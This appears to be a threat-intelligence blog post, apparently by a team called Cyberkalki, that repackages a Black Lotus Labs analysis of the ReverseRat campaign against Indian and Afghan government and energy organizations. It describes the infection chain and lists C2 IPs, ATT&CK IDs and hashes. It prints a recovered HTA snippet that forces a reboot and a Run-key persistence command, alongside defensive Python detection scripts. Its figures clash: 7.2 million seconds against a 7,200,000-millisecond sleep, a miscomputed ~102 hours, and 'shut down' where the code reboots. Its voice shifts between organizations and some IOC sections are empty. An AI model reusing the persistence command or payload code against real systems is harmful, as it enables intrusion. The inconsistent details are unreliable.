# Pakistani Threat Group Targeting India and Asia’s Critical Industrial Sector Now – And What Are We Doing? Waiting for Hell to Break Loose!

We suspect a Pakistani threat actor executed a custom-developed framework to compromise multiple targets in South Asia, including a power company in India.

A team of researchers detected a new remote access Trojan they are calling ReverseRat.

Based on our global telemetry and analysis, we identified that the actor is targeting government and energy organizations in the South and Central Asia regions, with operational infrastructure hosted in Pakistan. ReverseRat was deployed in parallel with an open-source RAT called AllaKore to infect machines and achieve persistence. Given the critical nature of the sectors the actor is targeting, we advise security practitioners to learn the actor’s current tactics, tools and procedures to better defend their organizations against potential attacks.

There is a lot to know about the inner workings of how and why this happened, but the question remains: what next, and why now?

Based upon MalBeacon telemetry, we assess that the threat actor is very likely operating out of Pakistan. We observed a multi-step infection chain that resulted in the victim downloading two agents: one resided in memory, while the second was side-loaded, granting the threat actor persistence on the infected workstations. The technique documented in the image below was active beginning at least in March 2021, and bi-directional communications with the C2 are, in some instances, still ongoing.

In the first phase of the infection depicted in Figure 1, targeted URLs pointing to compromised websites were delivered to the victim. Black Lotus Labs surmised that the threat actor chose to use compromised domains in the same country as the targeted organization to evade detection and blend in with standard web browsing activity on the target network. While we cannot independently confirm how the URLs were delivered to the victims, the actor likely sent targeted emails or messages.

When clicked, these links downloaded a .zip file containing a Microsoft shortcut file (.lnk) and a benign PDF file. If invoked by the user, the shortcut file would display a benign PDF file, as depicted in Figures 2 and 3. The PDF file acted as a decoy to distract the user while the shortcut file also surreptitiously retrieved and executed an HTA file (HTML application) from the same compromised website. In the observed campaigns, the actor-created HTA files were hosted on the same site as the .zip file, but at different URL paths.
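As an added example (not code from the original report or from Black Lotus Labs), the following Python script parses a shortcut file's StringData and flags shortcuts that launch mshta.exe with a remote HTA, the pattern described above. The sample shortcut it builds is constructed in memory; its relative target path mirrors the one recovered from this page's LNK metadata, and the URL and description are placeholders.

```python
import struct

# LinkFlags bits from the MS-SHLLINK specification
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_FIELDS = ((HAS_NAME, "description"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))


def parse_lnk(data):
    """Minimal shell-link parser: returns the StringData fields as a dict."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 76 or clsid != LNK_CLSID:
        raise ValueError("not a shell link (.lnk) file")
    pos = 76                                   # fixed-size ShellLinkHeader
    if flags & HAS_ID_LIST:                    # LinkTargetIDList: 2-byte size + items
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:                  # LinkInfo: first dword is its total size
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    fields = {}
    for bit, name in STRING_FIELDS:            # StringData, in specification order
        if flags & bit:
            count, = struct.unpack_from("<H", data, pos)
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += count * width
    return fields


def is_suspicious(fields):
    """Flag shortcuts whose target is mshta.exe (the LNK -> remote HTA pattern)."""
    target = fields.get("relative_path", "").lower()
    args = fields.get("arguments", "").lower()
    if not target.endswith("mshta.exe"):
        return False, "target is not mshta.exe"
    if "http://" in args or "https://" in args:
        return True, "mshta.exe launched with a remote HTA URL"
    return True, "mshta.exe launched from a shortcut"


def build_lnk(relative_path, arguments, description=""):
    """Construct a minimal Unicode .lnk in memory (test fixture; no IDList/LinkInfo)."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE | (HAS_NAME if description else 0)
    header = struct.pack("<I16sI", 76, LNK_CLSID, flags) + bytes(76 - 24)

    def string_data(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = string_data(description) if description else b""
    return header + body + string_data(relative_path) + string_data(arguments)


# Constructed sample modelled on the shortcut metadata described on this page;
# the URL is a placeholder, not an indicator from the report
SAMPLE_LNK = build_lnk(r"..\..\..\..\..\Windows\System32\mshta.exe",
                       "http://compromised.example/files/css/css.hta",
                       "NDS-potential-candidates-for-internation-courses")
```

Triage of a real shortcut is `is_suspicious(parse_lnk(open(path, "rb").read()))`; the parser skips the IDList and LinkInfo blocks that real shortcuts carry, so the StringData offsets stay correct.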

The decoy PDF documents associated with this larger cluster of activity referred to organizations and events relevant to India in spring 2021. Some of the decoy documents, or lures, were more generic, making references to obtaining COVID-19 vaccines, while others were more targeted toward, for example, the energy sector.

## Affected Scope

INDUSTRIES: Energy, Government

TARGETED COUNTRIES: Afghanistan, India

MALWARE FAMILY: ReverseRat

ATT&CK IDS:

T1055 – Process Injection

T1102 – Web Service

T1113 – Screen Capture

T1127 – Trusted Developer Utilities Proxy Execution

T1547 – Boot or Logon Autostart Execution

T1574 – Hijack Execution Flow

T1002 – Data Compressed

T1204.002 – Malicious File

T1059 – Command and Scripting Interpreter

T1218.005 – Mshta

T1219 – Remote Access Software

T1059.003 – Windows Command Shell

T1041 – Exfiltration Over C2 Channel

## Phase 2: Activating HTA files: CactusTorch and preBotHta

In the next phase of infection, the first HTA file retrieved contained JavaScript code based on a GitHub project called CactusTorch. This project was designed to inject a 32-bit shellcode into a running process to help launch a .NET program called preBotHta.pdb, which this actor has been using since 2019. There were two notable features of this 2021 variant of the preBotHta file: first, it ran entirely in memory and, second, it contained logic to alter the placement of ReverseRat if the host machine ran a certain anti-virus product. If the preBotHta file detected a certain AV product, such as Kaspersky, it placed ReverseRat in the MyMusic path; otherwise, it placed the file in the Startup folder. When ReverseRat was saved to the file system in January 2021, it displayed the name tasksmgr.exe; later in the year, they renamed it officetool.exe. Both iterations used an internal file description name of Svchostt.exe.

### The ReverseRat

The last action preBotHta took was to start execution of ReverseRat. The agent began by enumerating the infected device and obtaining the following components via Windows Management Instrumentation (WMI):

• Physical memory on the device, converted to MB

• Max clock speed, converted to GHz

• Data width, converted to bits

• Name (e.g. Intel® Core i7-8569U CPU @ 2.80GHz)

• Manufacturer (e.g. GenuineIntel)

It also used the .NET framework to obtain the following:

The agent then RC4-encrypted this data with a key and sent it to the C2 node. When we decompiled the .NET code, we found the agent had prebuilt functions to run any of the following commands based upon receiving the correct parameter.

Based upon other functions, like the one designed to download executables, and other included functions that convert strings to hex, we suspect that there are subsequent modules that could provide added capabilities.

We assess that ReverseRat was developed in-house: artifacts in the samples revealed PDB paths that showed the internal name for this project and that a developer on the project used the screen name Zombie. PDB paths often reference the original path of the source code files on the actor’s machine. This file was likely imported and compiled by other members of the organization, such as the user Neil, as indicated in this metadata.

c:\Users\Zombie\Desktop\ReverseRat client\ReverseRat\ReverseRat\obj\Release\svchostt.pdb

c:\Users\Neil\Desktop\inform\c\ReverseRat\ReverseRat\obj\Debug\ReverseRat.pdb

Notably, the CactusTorch HTA file that dropped ReverseRat included a modification to a JavaScript function that shut down the infected machine after up to 7.2 million seconds (2,000 hours). Previous iterations of this script only allowed the computer to sleep for 900,000 seconds (~102 hours). It is unclear what caused the threat actors to change this time setting.

```javascript
// Actor-modified tail of the CactusTorch script, as recovered from the HTA:
// sleep for the hard-coded interval (WScript.Sleep takes milliseconds), then force a reboot
shell = new ActiveXObject('WScript.Shell');
WScript.Sleep(7200000);
var exec = shell.Exec('cmd.exe /k shutdown /r /t 0');
exec.StdIn.Close();
```

### Component 3: The AllaKore Component

In the third component, a second HTA file was retrieved from the same compromised domain that hosted the ZIP and the first HTA file. The second HTA file contained an encoded command to modify a registry key, the loader and AllaKore. Once decoded, the HTA file revealed a version of the AllaKore remote agent, potentially to provide an alternative avenue to maintain access to the compromised network. One rather odd trait of the campaign was the parallel deployment of ReverseRat with AllaKore.

The actor maintained persistence on the target machine’s current user account across reboots by modifying the Run registry key so that the actor-dropped file is launched and side-loads the malicious DLL.

Command modifying the Run registry key:

```cmd
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WinLogs" /t REG_SZ /F /D "C:\ProgramData\WinLogs\credwiz.exe"
```

The threat actor side-loaded DUser.dll along with the legitimate Windows application credwiz.exe, a file traditionally used for backing up and restoring credentials. DUser.dll acted as a loader: it called CreateProcess on its companion file, winidr.exe [note the typo in the filename], and ran a wait loop until the AllaKore sample was terminated.
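As an added example (not from the original report), this Python script runs the two persistence checks a defender would want over constructed Sysmon-style process and image-load events: a Run-key value pointing at a user-writable path, and credwiz.exe executing from, or loading DUser.dll from, outside System32. The event field names are assumptions; the REG ADD command line and the ProgramData\WinLogs path are the ones quoted above.

```python
import re

# Constructed sample events in a Sysmon-like shape (field names assumed, not real telemetry)
EVENTS = [
    {"event": "process_create", "image": r"C:\Windows\System32\reg.exe",
     "command_line": r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" '
                     r'/V "WinLogs" /t REG_SZ /F /D "C:\ProgramData\WinLogs\credwiz.exe"'},
    {"event": "process_create", "image": r"C:\ProgramData\WinLogs\credwiz.exe",
     "command_line": "credwiz.exe"},
    {"event": "image_load", "image": r"C:\ProgramData\WinLogs\credwiz.exe",
     "loaded": r"C:\ProgramData\WinLogs\DUser.dll"},
    # benign baseline: the real credwiz.exe loading the real DUser.dll
    {"event": "process_create", "image": r"C:\Windows\System32\credwiz.exe",
     "command_line": "credwiz.exe"},
    {"event": "image_load", "image": r"C:\Windows\System32\credwiz.exe",
     "loaded": r"C:\Windows\System32\DUser.dll"},
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\")
RUN_KEY_RE = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?hk(?:cu|lm)\\software\\microsoft\\windows\\currentversion\\run',
    re.IGNORECASE)
RUN_DATA_RE = re.compile(r'/d\s+"?([^"]+)', re.IGNORECASE)


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def check_event(ev):
    """Return a list of alert strings for one event (empty list if nothing matched)."""
    alerts = []
    image = ev.get("image", "").lower()
    if ev["event"] == "process_create":
        cmd = ev.get("command_line", "")
        if RUN_KEY_RE.search(cmd):
            data = RUN_DATA_RE.search(cmd)
            target = data.group(1).lower() if data else ""
            if target.startswith(USER_WRITABLE):
                alerts.append(f"Run-key persistence pointing at user-writable path: {target}")
        if image.endswith("\\credwiz.exe") and not in_system_dir(image):
            alerts.append(f"credwiz.exe executing outside System32: {image}")
    elif ev["event"] == "image_load":
        dll = ev.get("loaded", "").lower()
        if image.endswith("\\credwiz.exe") and dll.endswith("\\duser.dll") and not in_system_dir(dll):
            alerts.append(f"possible DLL side-load of {dll} into {image}")
    return alerts


def scan(events):
    """Run check_event over every event and flatten the alerts."""
    return [alert for ev in events for alert in check_event(ev)]
```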

Fortunately for defenders, this agent does not appear to come with any encryption, and it can be detected through network-based monitoring. When we ran the sample in a sandbox, we observed some of the strings in HTTP communications such as “MAINSOCKET”.

Once we identified the infection chain detailed above, we correlated this campaign’s TTPs to a prior campaign from last year called Operation SideCopy. We observed the same infection process: using shortcut files to retrieve a malicious HTA file on a compromised domain and then spawn a .NET agent. In this case we also observed overlapping metadata between the new and old samples. Notably, we even found overlap with TTPs described in a post dating back to 2019 that described a threat actor side-loading an AllaKore agent with credwiz.exe. Because this actor has operated for years tailoring open-source frameworks, we observe nuances in their environments, such as the PDB string that linked other customized open-source capabilities, including the Bladabindi agent (based on the well-known trojan njRAT). The similarity in the two extracted PDB paths is visible below. The top line is the ReverseRat agent internally called Svchostt, and the second is the njRAT sample internally called server:

C:\Users\be\AppData\Local\Temporary Projects\svchostt\obj\x86\Release\svchostt.pdb

C:\Users\be\AppData\Local\Temporary Projects\server\obj\x86\Release\server.pdb

While njRAT is a well-known and documented agent, it shows that this threat actor, like many others, may prefer to use publicly available agents over custom builds.

### Black Lotus Labs Telemetry and Analytics

Telemetry – Victim

A small number of entities exhibited bi-directional communications with the identified nodes.

Most of the organizations that exhibited signs of compromise were in India, and a small number were in Afghanistan. The potentially compromised victims aligned with the government and power utility verticals. One point we would like to emphasise is that the agents we discovered were designed for Windows-based machines traditionally found on the IT network; thus far we have not been able to associate any malware samples with this activity cluster that were specifically designed to target systems associated with OT systems.

Some of the victims include:

• A foreign government organization

• A power transmission organization

• A power generation and transmission organization

We do not believe that this list entails the totality of their operations, as some potential victims were associated with dynamic IP addresses, making it difficult to correlate those IP addresses to a single organization.

Telemetry – Threat Actor

Both Black Lotus Labs and MalBeacon were able to independently conclude the actor’s C2 operations are based out of Pakistan. MalBeacon identified the actor source IP, 103.255.7[.]33, an IP assigned to Pakistani mobile data operator CMPak Limited.

Through thorough deep-dive research by the Cyberkalki Security team, we identified that the source is linked with past malicious behaviour and runs a decentralised C2 network; the tools are sophisticated and the malware injection techniques used are covert.

Separately, based on Black Lotus Labs analytics and global visibility, we determined that the ReverseRat C2 nodes are controlled by at least two Pakistani IPs, 203.175.72[.]105 and 115.186.189[.]6, on port 8088. Notably, 182.188.181[.]224 briefly served as a backend node for this operation, located at 167.86.97[.]221. The hosts 203.175.72[.]105 and 173.249.40[.]68, used for scanning targets and DNS, are backed by CMPak and the DDNSKing provider.

Backends and source range IPs:


Analytics

Black Lotus Labs identified the following network indicators from files pertaining to this infection vector:


Based on internal network telemetry analytics, passive DNS records and open-source malware repositories for related samples, Black Lotus Labs discovered IPs and domains we can also associate with moderately high confidence to this actor.


In total, the following IOC counts are available for deep analysis:

FileHash-MD5: 34 | FileHash-SHA1: 34 | FileHash-SHA256: 38 | IPv4: 16 | URL: 15 | Domain: 4 | Hostname: 6

## Suspicious Files Dropper

File: EngrCorpsPolicy.zip

| Property | Value |
|---|---|
| MD5 | bbca148bb1f0d911e286acc779eb738b |
| SHA-1 | 4a8b60fed40bda174749ed79e6a0af4cda408916 |
| SHA-256 | b74e20c912e5c1529ec73bcd89776d4f81e56663edcfaccc82ecac50e34d5284 |
| Vhash | e387536079be3670f79e839f8f3c78b0 |
| SSDEEP | 24576:aXnTK3x6bLEjQXnBdVjvOSB5aLGXdXKKO9YMrPUOFn/r8ttiRWs2s2CsB:Un5bLEjQXnBXjvOMkLGNXKKOuezFnTSR |
| File type | ZIP |
| Magic | Zip archive data, at least v1.0 to extract |
| TrID | ZIP compressed archive (80%) |
| TrID | PrintFox/Pagefox bitmap (640×800) (20%) |
| File size | 1.21 MB (1265374 bytes) |

### Bundled Files

• Posting (AllTypes), Promotions, and Other Record Wing Matters.pdf.lnk

• Policy Matters Of Corps/Policy Matters Of Corps.pdf

## Interesting Strings

http://purl.org/dc/elements/1.1/

http://www.w3.org/1999/02/22

System32

mshta.exe

C:\Windows\System32\mshta.exe

desktop-g1i8n3f

<mshta.exe

0NDS-potential-candidates-for-internation-courses)..\..\..\..\..\Windows\System32\mshta.exe

S-1-5-21-2201614678-3791617218-3976912000-1001

## EXIF Data

| Property | Value |
|---|---|
| ZIP:ZipBitFlag | 0 |
| ZIP:ZipCRC | 0x00000000 |
| ZIP:ZipCompressedSize | 0 |
| ZIP:ZipCompression | None |
| ZIP:ZipFileName | Policy Matters Of Corps/ |
| ZIP:ZipModifyDate | 2021:05:27 07:35:06 |
| ZIP:ZipRequiredVersion | 10 |
| ZIP:ZipUncompressedSize | 0 |
| PDF:CreateDate | 2021:05:27 06:16:02+00:00 |
| PDF:Creator | Microsoft® Word for Microsoft 365 |
| PDF:Language | en-US |
| PDF:Linearized | No |
| PDF:ModifyDate | 2021:05:27 06:16:02+00:00 |
| PDF:PDFVersion | 1.7 |
| PDF:PageCount | 4 |
| PDF:Producer | Microsoft® Word for Microsoft 365 |
| PDF:TaggedPDF | Yes |
| XMP:CreateDate | 2021:05:27 06:16:02+00:00 |
| LNK:AccessDate | 2020:03:04 01:48:10+00:00 |
| LNK:CommandLineArguments | |
| LNK:CreateDate | 2019:03:19 04:46:01+00:00 |
| LNK:Description | NDS-potential-candidates-for-internation-courses |
| LNK:DriveType | Fixed Disk |
| LNK:FileAttributes | Archive |
| LNK:Flags | IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode |
| LNK:HotKey | (none) |
| LNK:IconFileName | %SystemRoot%\System32\SHELL32.dll |
| LNK:IconIndex | 1 |

All 202 hashes for analysis are stored here.

## LNK

| Name | Value |
|---|---|
| | 76 |
| guid | 0114020000000000c000000000000046 |
| creation_time | 1319744436 |
| accessed_time | 1322776009 |
| modified_time | 1319744436 |
| file_size | 13312 |
| icon_index | 1 |
| windowstyle | SW_NORMAL |
| hotkey | UNSET – UNSET {0x0000} |
| reserved0 | 0 |

## Mutexes

Local\!PrivacIE!SharedMemory!Mutex

Local\WininetConnectionMutex

Local\_!MSFTHISTORY!_

RasPbFile

Local\ZonesLockedCacheCounterMutex

Local\ZoneAttributeCacheCounterMutex

Local\WininetProxyRegistryMutex

IESQMMUTEX_0_208

## File Behavior

C:\Windows\winsxs\FileMaps\_system32_21f9a9c4a2f8b514.cdf-ms

## Sample File behaviour captured

All IOC related to the sample files, from DLL analysis to registry changes, are stored here with screenshots.

## Key IOC


All IOC, hashes and relevant indicators are stored here


Secondary ASN: AS17557 (Pakistan Telecommunication Company Limited)


Hence, the Cyberkalki team has identified infrastructure, TTPs and network artefacts to gain deep insights on this threat group, and will continue to monitor the infrastructure based on traffic patterns.

### Threat Assessment

• The ReverseRat infection chain is noteworthy because of the steps it takes to avoid detection and the critical nature of the targeted entities.

• While this threat actor’s targets have thus far remained within the South and Central Asian regions, they have proven effective at gaining access to networks of interest.

• Black Lotus Labs assesses that as this actor continues to develop its capabilities and refine its multi-step infection processes, it could pose a real threat to organizations in and beyond these regions.

### Black Lotus Labs Response

• To combat this campaign, Black Lotus Labs null-routed the actor’s infrastructure across the Lumen global IP network and notified the affected organizations.

• Black Lotus Labs continues to follow this threat group to detect and disrupt similar compromises, and it encourages other organizations to monitor for and address this and similar campaigns in their environments.

• Black Lotus Labs is committed to tracking adversary groups such as this and documenting their tradecraft to proactively help defenders.

## Conclusion

While this threat actor’s targets have thus far remained within the South and Central Asian regions, they have proven effective at gaining access to networks of interest. Despite previously relying upon open source frameworks such as AllaKore, the actor was able to remain effective and expand its capabilities with the development of the Svchost agent and other components of the ReverseRat project.

We assess that as the actor continues to develop these capabilities, utilise compromised domains and refine these multi-step infection processes, it will pose a real threat to organizations in and beyond these regions. While this actor is not as sophisticated as the most-skilled state-sponsored actors, it should be continually monitored. Black Lotus Labs is committed to tracking adversary groups such as this and documenting their trade-craft to proactively help defenders.

In order to combat this particular campaign, Black Lotus Labs null-routed the actor infrastructure across the global IP network and continues to follow this threat group to detect and disrupt similar compromises, and we encourage other organizations to alert on this and similar campaigns in their environments.

The Cyberkalki team has successfully analysed the root cause and fix for this risk, and requests people and officials from power, energy and other CI teams to contact us for a specific mitigation strategy and support. We would love to help you for FREE, as a service to our beloved nation INDIA. Big thanks to the @OTX team and Black Lotus Labs for intel sharing and analysis with deep inspection.